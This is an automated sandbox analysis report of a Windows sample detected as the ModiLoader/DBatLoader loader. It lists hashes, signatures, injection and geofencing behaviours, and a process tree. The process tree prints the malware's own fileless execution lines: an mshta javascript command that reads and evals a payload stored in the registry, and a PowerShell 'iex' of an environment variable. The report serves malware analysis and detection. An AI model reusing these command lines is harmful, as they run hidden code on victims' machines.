Analysis
-
max time kernel
141s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
16-09-2024 21:28
Static task
static1
Behavioral task
behavioral1
Sample
e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe
-
Size
280KB
-
MD5
e5990b62885a2d4e4da05061716ff52d
-
SHA1
4db4280bcfe42ca1445cf89ac0b05644734f4699
-
SHA256
06590a959dc72ebcf89ead6e3e6237c9e2284a038a8d96e72434676d0b4eaeea
-
SHA512
fce76198d0708586fd745130e88973d6f95736b883981af97219d65e97c2a7057e07e931a3f4416f8fc77a3df91fe30c371387e43a1fbaf543cafb2b424bc634
-
SSDEEP
6144:/pvfrqWmBumMz5rCDcmu3IXiWkHuVtxydKvyGILI/B2/pFi:/pvJlCAmZXRLydKvyGILI/W0
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 712 2920 mshta.exe 90 -
ModiLoader Second Stage 10 IoCs
resource yara_rule behavioral2/memory/864-2-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral2/memory/864-4-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral2/memory/864-5-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral2/memory/864-6-0x00000000008C0000-0x0000000000996000-memory.dmp modiloader_stage2 behavioral2/memory/864-10-0x00000000008C0000-0x0000000000996000-memory.dmp modiloader_stage2 behavioral2/memory/864-9-0x00000000008C0000-0x0000000000996000-memory.dmp modiloader_stage2 behavioral2/memory/864-7-0x00000000008C0000-0x0000000000996000-memory.dmp modiloader_stage2 behavioral2/memory/864-8-0x00000000008C0000-0x0000000000996000-memory.dmp modiloader_stage2 behavioral2/memory/864-11-0x00000000008C0000-0x0000000000996000-memory.dmp modiloader_stage2 behavioral2/memory/864-12-0x00000000008C0000-0x0000000000996000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation mshta.exe -
pid Process 4880 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2980 set thread context of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4880 powershell.exe 4880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4880 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 2980 wrote to memory of 864 2980 e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe 89 PID 712 wrote to memory of 4880 712 mshta.exe 92 PID 712 wrote to memory of 4880 712 mshta.exe 92 PID 712 wrote to memory of 4880 712 mshta.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe"2⤵
- System Location Discovery: System Language Discovery
PID:864
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:S7OazXbF="qRN7x";m29q=new%20ActiveXObject("WScript.Shell");Kw2rtSI7N="dC6alhr";i6TS3G=m29q.RegRead("HKLM\\software\\Wow6432Node\\s4Kqdxs9a\\kEdbtQd61l");sz7KiR="zU";eval(i6TS3G);K6OtIb="iWETE";1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:pcyjap2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4668,i,16315016104747277319,5510969007830467313,262144 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:81⤵PID:4776
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82